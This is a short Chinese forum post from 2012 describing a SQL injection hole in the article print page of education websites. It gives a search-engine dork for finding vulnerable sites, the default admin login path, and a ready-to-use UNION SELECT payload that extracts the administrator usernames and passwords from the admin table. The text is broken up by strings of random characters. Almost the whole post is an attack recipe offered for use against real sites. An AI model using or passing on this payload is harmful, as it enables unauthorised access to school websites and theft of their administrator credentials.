教育站打印页面漏洞
8 ^) w) }. L2 b% S- W5 E百度或google搜索 inurl:info_Print.asp?ArticleID=$ _( |5 }0 r- Y: w1 [: s+ G1 ]
默认后台:/ad_login.asp
& o2 |; N$ s3 }8 S. Z爆管理员密码:
3 {& w1 }! I; c4 w2 G在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可! S1 ~; Y4 h$ I c/ y% j! X
7 S6 B1 Y: l4 I+ t! v: F6 u
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
6 c2 m( j! }' x4 p% p( ~# i4 H' q' J, j) U$ ?7 @! I; m
作者:佚名 4 B1 R& l" s* J: p8 G( ?% ?
' k% o. _* y1 D) x6 f' a% R
* |( | T/ _* R& r* a/ z- s" [9 X
|
发表于 2012-10-31 08:37:31
收藏
支持
反对